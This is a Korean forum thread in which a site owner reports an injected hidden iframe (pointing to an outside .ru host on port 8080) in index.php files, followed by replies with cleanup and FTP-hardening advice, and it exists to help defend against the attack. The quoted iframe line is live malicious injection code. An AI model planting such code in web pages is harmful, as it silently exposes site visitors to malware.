해킹에 따른 대처 방안 정보
해킹에 따른 대처 방안본문
해킹 당한거 같습니다. 아래와 같은 코드가 index.php 와 adm/index.php 에
삽입 되어 있네요
<iframe src="http://3bj.ru:8080/index.php" width=134 height=110 style="visibility: hidden"></iframe>
호스팅은 카페24를 쓰고 있고 나름 비밀번호도 어렵게 조합해서 쓰고 있었는데
대처할 수 있는 조언 부탁드립니다.
삽입 되어 있네요
<iframe src="http://3bj.ru:8080/index.php" width=134 height=110 style="visibility: hidden"></iframe>
호스팅은 카페24를 쓰고 있고 나름 비밀번호도 어렵게 조합해서 쓰고 있었는데
대처할 수 있는 조언 부탁드립니다.
댓글 전체
아래에도 비슷한 경우가 있더군요.
참고하세요 http://sir.co.kr/bbs/tb.php/g4_qa/134900
참고하세요 http://sir.co.kr/bbs/tb.php/g4_qa/134900
일단 코드를 전부 삭제하시고 전부 복구가 되면,
(하위 폴더도 다 보셔야 합니다.)
작업하시는 컴퓨터, 피씨그린, v3lite 등을 이용해서 정밀검사 해보세요.
기본검사만해도 백도어 나올껍니다.
전부 치료하신다음
ftp 접속 비밀 번호 특수기호 들어가게 바꾸시고, 가능하면 sftp 이용하시고,
ftp 접속프로그램 이용하실때 아이디 비밀번호 여러개 저장 시키지 마시고,
가능하시면 접속하실때마다 타이핑해서 들어가세요~
그리고 꾸준히 바이러스 검사 해주시고요 ^^
일단은 이렇고요 iframe 으로 검색해보시면 (sir에서..) 관련 자료 많이 나와요 ^^
(하위 폴더도 다 보셔야 합니다.)
작업하시는 컴퓨터, 피씨그린, v3lite 등을 이용해서 정밀검사 해보세요.
기본검사만해도 백도어 나올껍니다.
전부 치료하신다음
ftp 접속 비밀 번호 특수기호 들어가게 바꾸시고, 가능하면 sftp 이용하시고,
ftp 접속프로그램 이용하실때 아이디 비밀번호 여러개 저장 시키지 마시고,
가능하시면 접속하실때마다 타이핑해서 들어가세요~
그리고 꾸준히 바이러스 검사 해주시고요 ^^
일단은 이렇고요 iframe 으로 검색해보시면 (sir에서..) 관련 자료 많이 나와요 ^^
어베스트 라는 백신프로그램이 잘잡습니다
제경우 그걸로 잡고 비번바꾸니 아직은 괜찮네요
제경우 그걸로 잡고 비번바꾸니 아직은 괜찮네요
